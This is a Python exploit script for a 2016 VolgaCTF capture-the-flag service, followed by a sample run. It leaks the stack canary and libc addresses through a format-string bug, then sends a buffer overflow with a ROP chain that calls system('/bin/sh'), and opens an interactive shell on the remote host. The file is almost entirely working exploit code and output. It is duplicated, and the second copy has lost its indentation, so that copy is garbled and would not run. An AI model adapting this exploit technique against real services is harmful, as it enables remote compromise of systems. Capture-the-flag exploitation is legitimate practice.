LiveOverflow/web_of_science2.py

## web_of_science2.py
import socket
import telnetlib
import struct
import hashlib
import random

"""
root $ python web_of_science2.py
[*] connected to webofscience2.2016.volgactf.ru:45679
[+] recv: 'Tell me your name first\n'
[*] send format string to leak addresses
[+] recv: 'Alright, pass a little test first, would you.\n3668 + 8932 = ?\ncanary:|||985e5f08a2bbd800||| srand@GOT:|||\xa0Yg\xf7\xff\x7f||| stack:|||7fffffffeba0|||, your response: '
[*] stack canary: 0x985e5f08a2bbd800
[*] srand@GOT: 0x7ffff76759a0
[*] stack: 0x7fffffffeba0
[*] libc base: 0x7ffff7639000
[*] system(): 0x7ffff767f640
[+] Solving the 0. sum: 3668 + 8932 = 12600
[+] Solving the 1. sum: 45317 + 33218 = 78535
[+] Solving the 2. sum: 40618 + 20647 = 61265
[+] Solving the 3. sum: 7894 + 26236 = 34130
[+] Solving the 4. sum: 47062 + 28527 = 75589
[+] Solving the 5. sum: 58563 + 25165 = 83728
[+] Solving the 6. sum: 43846 + 3454 = 47300
[+] Solving the 7. sum: 25307 + 25358 = 50665
[+] Solving the 8. sum: 41468 + 10092 = 51560
[+] Solving the 9. sum: 5859 + 28760 = 34619
[*] Sending the buffer overflow
[*] Exit the menu, to trigger the `ret`
[*] here is your shell:
Linux Ubuntu1404x64 3.13.0-83-generic #127-Ubuntu SMP Fri Mar 11 00:25:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
ls -la
total 32
drwxr-xr-x  2 root root  4096 Mar 26 08:11 .
drwxr-xr-x 22 root root  4096 Mar 26 07:43 ..
-rw-r--r--  1 root root    37 Mar 26 07:47 flag_wos2.txt
-rwxr-xr-x  1 root root    85 Mar 26 07:47 install
-rwxr-xr-x  1 root root   295 Mar 26 08:11 start_wos2
-rwxr-xr-x  1 root root 10504 Mar 26 07:47 web_of_science2
cat flag_wos2.txt
VolgaCTF{DEP_with0ut_ASLR_is_us3less}
"""

REMOTE = True


def padzero(s):
    return s+"\x00"*(8-len(s))


def recv_all(s):
    b = ""
    last_recv = True
    while last_recv:
        try:
            last_recv = s.recv(1024)
        except socket.timeout:
            last_recv = None
        if last_recv:
            b += last_recv
    return b

# socat TCP-LISTEN:1337,reuseaddr,fork EXEC:"./web_of_science2"
SERVER = ('localhost', 1337)
SRANDOM_OFFSET = 0x3c9a0
SYSTEM_OFFSET = 0x46640
POP_RDI_OFFSET = 0x22b1a

if REMOTE:
    SERVER = ('webofscience2.2016.volgactf.ru', 45679)

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

s.connect(SERVER)
s.settimeout(0.5)
print("[*] connected to {}:{}".format(SERVER[0], SERVER[1]))

r = recv_all(s)
print("[+] recv: {}".format(repr(r)))


print("[*] send format string to leak addresses")
s.sendall("canary:|||%43$llx||| srand@GOT:|||%23$s||| stack:|||%46$llx|||\n")

r = recv_all(s)
print("[+] recv: {}".format(repr(r)))
canary = int(r.split('|||')[1], 16)
srand = struct.unpack("Q", padzero(r.split('|||')[3]))[0]
stack = int(r.split('|||')[5], 16)
libc = srand - SRANDOM_OFFSET
system = libc + SYSTEM_OFFSET
pop_rdi = libc + POP_RDI_OFFSET
print("[*] stack canary: 0x{:x}".format(canary))
print("[*] srand@GOT: 0x{:x}".format(srand))
print("[*] stack: 0x{:x}".format(stack))
print "[*] libc base: 0x{:x}".format(libc)
print "[*] system(): 0x{:x}".format(system)

for i in xrange(0, 10):
    for l in r.split("\n"):
        if '=' in l:
            chall = l.split(" ")
            summe = int(chall[0])+int(chall[2])
            print("[+] Solving the {}. sum: {} + {} = {}".format(i, chall[0], chall[2], summe))
            s.sendall(str(summe)+"\n")
    r = recv_all(s)

print "[*] Sending the buffer overflow"
s.sendall("AAAAAAAABBBBBBBBCCCCCCCCDDDDDDDDEEEEEEEE"+struct.pack("Q", canary)+"GGGGGGGG"+struct.pack("Q", pop_rdi)+struct.pack("Q", stack)+struct.pack("Q", system)+"/bin/sh;/bin/sh;/bin/sh;/bin/sh;/bin/sh;/bin/sh;/bin/sh;\n")
print "[*] Exit the menu, to trigger the `ret`"
s.sendall("5\n")
# ignore the menu output
_ = recv_all(s)
print "[*] here is your shell:"
s.sendall("uname -a\n")
s.sendall("id\n")
t = telnetlib.Telnet()
t.sock = s
t.interact()
	import socket
	import telnetlib
	import struct
	import hashlib
	import random

	"""
	root $ python web_of_science2.py
	[*] connected to webofscience2.2016.volgactf.ru:45679
	[+] recv: 'Tell me your name first\n'
	[*] send format string to leak addresses
	[+] recv: 'Alright, pass a little test first, would you.\n3668 + 8932 = ?\ncanary:\|\|\|985e5f08a2bbd800\|\|\| srand@GOT:\|\|\|\xa0Yg\xf7\xff\x7f\|\|\| stack:\|\|\|7fffffffeba0\|\|\|, your response: '
	[*] stack canary: 0x985e5f08a2bbd800
	[*] srand@GOT: 0x7ffff76759a0
	[*] stack: 0x7fffffffeba0
	[*] libc base: 0x7ffff7639000
	[*] system(): 0x7ffff767f640
	[+] Solving the 0. sum: 3668 + 8932 = 12600
	[+] Solving the 1. sum: 45317 + 33218 = 78535
	[+] Solving the 2. sum: 40618 + 20647 = 61265
	[+] Solving the 3. sum: 7894 + 26236 = 34130
	[+] Solving the 4. sum: 47062 + 28527 = 75589
	[+] Solving the 5. sum: 58563 + 25165 = 83728
	[+] Solving the 6. sum: 43846 + 3454 = 47300
	[+] Solving the 7. sum: 25307 + 25358 = 50665
	[+] Solving the 8. sum: 41468 + 10092 = 51560
	[+] Solving the 9. sum: 5859 + 28760 = 34619
	[*] Sending the buffer overflow
	[*] Exit the menu, to trigger the `ret`
	[*] here is your shell:
	Linux Ubuntu1404x64 3.13.0-83-generic #127-Ubuntu SMP Fri Mar 11 00:25:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
	uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
	ls -la
	total 32
	drwxr-xr-x 2 root root 4096 Mar 26 08:11 .
	drwxr-xr-x 22 root root 4096 Mar 26 07:43 ..
	-rw-r--r-- 1 root root 37 Mar 26 07:47 flag_wos2.txt
	-rwxr-xr-x 1 root root 85 Mar 26 07:47 install
	-rwxr-xr-x 1 root root 295 Mar 26 08:11 start_wos2
	-rwxr-xr-x 1 root root 10504 Mar 26 07:47 web_of_science2
	cat flag_wos2.txt
	VolgaCTF{DEP_with0ut_ASLR_is_us3less}
	"""

	REMOTE = True


	def padzero(s):
	return s+"\x00"*(8-len(s))


	def recv_all(s):
	b = ""
	last_recv = True
	while last_recv:
	try:
	last_recv = s.recv(1024)
	except socket.timeout:
	last_recv = None
	if last_recv:
	b += last_recv
	return b

	# socat TCP-LISTEN:1337,reuseaddr,fork EXEC:"./web_of_science2"
	SERVER = ('localhost', 1337)
	SRANDOM_OFFSET = 0x3c9a0
	SYSTEM_OFFSET = 0x46640
	POP_RDI_OFFSET = 0x22b1a

	if REMOTE:
	SERVER = ('webofscience2.2016.volgactf.ru', 45679)

	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

	s.connect(SERVER)
	s.settimeout(0.5)
	print("[*] connected to {}:{}".format(SERVER[0], SERVER[1]))

	r = recv_all(s)
	print("[+] recv: {}".format(repr(r)))


	print("[*] send format string to leak addresses")
	s.sendall("canary:\|\|\|%43$llx\|\|\| srand@GOT:\|\|\|%23$s\|\|\| stack:\|\|\|%46$llx\|\|\|\n")

	r = recv_all(s)
	print("[+] recv: {}".format(repr(r)))
	canary = int(r.split('\|\|\|')[1], 16)
	srand = struct.unpack("Q", padzero(r.split('\|\|\|')[3]))[0]
	stack = int(r.split('\|\|\|')[5], 16)
	libc = srand - SRANDOM_OFFSET
	system = libc + SYSTEM_OFFSET
	pop_rdi = libc + POP_RDI_OFFSET
	print("[*] stack canary: 0x{:x}".format(canary))
	print("[*] srand@GOT: 0x{:x}".format(srand))
	print("[*] stack: 0x{:x}".format(stack))
	print "[*] libc base: 0x{:x}".format(libc)
	print "[*] system(): 0x{:x}".format(system)

	for i in xrange(0, 10):
	for l in r.split("\n"):
	if '=' in l:
	chall = l.split(" ")
	summe = int(chall[0])+int(chall[2])
	print("[+] Solving the {}. sum: {} + {} = {}".format(i, chall[0], chall[2], summe))
	s.sendall(str(summe)+"\n")
	r = recv_all(s)

	print "[*] Sending the buffer overflow"
	s.sendall("AAAAAAAABBBBBBBBCCCCCCCCDDDDDDDDEEEEEEEE"+struct.pack("Q", canary)+"GGGGGGGG"+struct.pack("Q", pop_rdi)+struct.pack("Q", stack)+struct.pack("Q", system)+"/bin/sh;/bin/sh;/bin/sh;/bin/sh;/bin/sh;/bin/sh;/bin/sh;\n")
	print "[*] Exit the menu, to trigger the `ret`"
	s.sendall("5\n")
	# ignore the menu output
	_ = recv_all(s)
	print "[*] here is your shell:"
	s.sendall("uname -a\n")
	s.sendall("id\n")
	t = telnetlib.Telnet()
	t.sock = s
	t.interact()